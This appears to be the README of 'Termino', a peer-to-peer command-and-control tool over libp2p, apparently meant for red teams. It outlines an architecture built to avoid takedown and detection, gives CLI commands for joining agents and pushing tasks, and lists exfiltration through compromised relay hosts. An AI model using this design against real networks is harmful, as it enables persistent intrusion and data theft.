Termino is a peer-to-peer command and control mesh over libp2p. Agents join a distributed network where tasks propagate through the mesh. No central server to discover, block, or take down.
operator ── task: whoami ──▶ mesh ──▶ agent-4f2a ──▶ output ──▶ mesh ──▶ operator
Each node is both a client and a relay. The mesh self-discovers, self-heals, and routes around failed nodes.
| Property | Traditional C2 (HTTP/S) | Termino (libp2p) |
|---|---|---|
| Single point of failure | Server domain/IP blocked → all agents lost | No server. Block one peer, mesh routes around it |
| Traffic profile | All agents beacon to one IP → obvious | Traffic scatters across peers |
| Discovery | Hardcoded server address | DHT + mDNS bootstrap |
| Resilience | Restart server → agents drift away | Mesh heals itself |
- Fully distributed — no server, no single point of control or failure
- libp2p transport — TCP, WebRTC, WebSocket; NAT traversal via DHT + relay
- Task propagation — broadcast tasks to all agents or target specific node IDs
- End-to-end encryption — libp2p's Noise protocol, every connection authenticated
- Operator TUI — watch live sessions, push tasks, receive output per node
- Command history — signed task log for operational tracking
┌─────────────────────────────────────────────────────────────────┐
│ libp2p mesh │
│ │
│ operator ◄────► agent-b3e2 ◄────► agent-7a1f ◄────► agent-4f2a │
│ │ │ │
│ └──────────◄────►──────────────┘ │
└─────────────────────────────────────────────────────────────────┘
Every node in the mesh runs the same binary. The operator node additionally exposes a TUI. Any node can be an operator. Any node can be lost without degrading the mesh.
Tasks and responses flow over a simple protobuf envelope:
message Envelope {
bytes source_id = 1;
bytes target_id = 2; // empty = broadcast
bytes task_id = 3;
string cmd = 4;
bytes args = 5;
bytes output = 6;
Status status = 7;
}# Start a bootstrap peer
termino --listen /ip4/0.0.0.0/tcp/9000
# Start an agent that joins the mesh (another machine)
termino --join /ip4/<bootstrap-ip>/tcp/9000
# Start operator with TUI
termino --join /ip4/<bootstrap-ip>/tcp/9000 --operator
# Push a task from the operator TUI, or via CLI:
termino task --target agent-4f2a --cmd "uname -a"- Red-team C2 — no infrastructure to burn; agents persist as long as the mesh has peers
- Resilient access — compromised hosts serve as relays for new implants
- Mesh-based exfiltration — route data through multiple peer hops before it leaves the network
- All traffic is encrypted (Noise XX handshake, perfect forward secrecy)
- No central authority — no CA, no server key, no bootstrap beyond the first peer address
- Task granularity — target a single agent by peer ID, a group by topic, or broadcast to all
- Offline queueing — if a target agent is unreachable, the task is stored and forwarded when it reconnects
- Agent registration (peer ID → hostname + metadata)
- Task propagation with acknowledgement
- File exfiltration over mesh (chunked + verified)
- SRV record bootstrap (no hardcoded peer address)
- ratatui operator dashboard
- Encrypted task log for operational audit
MIT. See LICENSE.